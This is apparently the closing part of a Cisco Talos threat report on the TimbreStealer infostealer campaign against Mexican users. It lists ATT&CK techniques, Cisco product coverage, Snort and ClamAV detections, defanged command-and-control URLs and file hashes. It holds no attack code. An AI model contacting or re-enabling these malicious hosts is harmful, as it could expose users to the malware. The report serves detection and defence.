T1012     | Query Registry
T1204     | User Execution: Malicious File
T1053.003 | Scheduled Task/Job: Cron
T1053.005 | Scheduled Task/Job: Scheduled Task
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1112     | Modify Registry

Coverage

Ways our customers can detect and block this threat are listed below.


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 63057 – 63072 and 300840 – 300844.

The following ClamAV signatures have been released to detect malware artifacts related to this threat:

  • Win.Infostealer.TimbreStealer-10021027-0
  • Win.Infostealer.TimbreStealer-10021026-0
  • Win.Infostealer.Generic-10017202-0
  • Win.Packed.Generic-10019162-0
  • Win.Dropper.Generic-10017203-0

Indicators of Compromise

IOCs for this research can be found in our GitHub repository here.

Potential C2 URLs

hxxps://hamster69[.]senac2021[.]org/~armadillo492370/
hxxps://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/
hxxps://69[.]64[.]35[.]1/~route649289/

IPs

Drop Site URLs

Domains

JavaScript Files

600d085638335542de1c06a012ec9d4c56ffe0373a5f61667158fc63894dde9f  (Downloader)

883674fa4c562f04685a2b733747e4070fe927e1db1443f9073f31dd0cb5e215  (Region check and redirect)

.URL Files

b1b85c821a7f3b5753becbbfa19d2e80e7dcbd5290d6d831fb07e91a21bdeaa7  CFDI_930209.zip

e04cee863791c26a275e0c06620ea7403c736f8cafbdda3417f854ae5d81a49f  FACTURA_560208.zip

aa187a53e55396238e97638032424d68ba2402259f2b308c9911777712b526af  FAC_560208_ATR890126GK2.url_

66af21ef63234c092441ec33351df0f829f08a2f48151557eb7a084c6275b791  FAC_930209_FME140910KI4.url_

Embedded Binaries

Dropper Binaries

Originally published by Guilherme Venere, Jacob Finn, Tucker Favreau, Jacob Stanfill, James Nutland: TimbreStealer campaign targets Mexican users with financial lures

Copyright notice: posted by admin on March 5, 2024, 12:00 AM.